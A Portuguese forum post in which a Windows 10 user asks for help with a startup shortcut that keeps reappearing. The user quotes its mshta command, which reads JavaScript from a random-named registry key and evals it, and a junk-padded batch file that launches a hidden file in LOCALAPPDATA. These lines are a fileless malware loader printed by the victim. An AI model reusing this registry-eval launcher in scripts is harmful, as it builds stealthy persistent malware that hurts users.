Windows 10, o que é este atalho na pasta de inicialização?

Existe um atalho na pasta de inicialização com isso como a linha de comando que executa. Eu deletei o atalho e ele só reaparece em segundos. Renomeie e um novo reaparece em segundos.

C:\Windows\System32\cmd.exe /C start "" mshta.exe "javascript:P4jMDuRB="Sm3jr6aQ";c40B=new ActiveXObject("WScript.Shell");QS2K8wl="cDy";nv5R4S=c40B.RegRead("HKCU\software\voxpbs\semhdvkm");g2McQ8A="Ns6iJl";eval(nv5R4S);JldeI3="1UbkKa";"

Também encontrei um arquivo de lote na pasta users \ me \ local. Os comandos que executa são:

echo J9pmT5Q
echo B0NWNWENzjH21WwgEa2kO0
echo 5Wjb2iki6K0a
echo FrG1NkCWmPPz57pvX
echo vxh8uiEY4zed9rLWqlq3INKnP
echo ZJ882016HVGsX28HEC53bkelC
echo x4SZRj8VY37HCvczeQ9
start "QevslvDchtWcI59vUY1" "%LOCALAPPDATA%d9b5f.3f751"
echo rDqX4A1lWPV1YBTn47sCq
echo US6k8ZpwRaBaZ8WjjuIWQoHhqnYhPf3U
echo VHu5IVd8Y0oGQx0qB0UJaQhjf
echo Q98kbBFD2PgR
echo uEyyzwkL88oeKhG1d3U3ds
echo lpM0oIMjeZ2IA5w9GGWaXzhx3PGmfoO
echo YJrUdLTH

Eu vejo isso sendo executado quando o computador é inicializado. É chamado por um nome de atalho "d178". Eu vejo a janela de comando por um curto período de tempo durante o processo de inicialização. Eu escaneei o arquivo "505f.3f751", não há infecções até o momento.

Se alguém tiver alguma ideia sobre o que é isso, seria legal. Eu não tentei uma inicialização no modo de segurança ainda para ver o que acontece depois. Eu provavelmente vou em breve.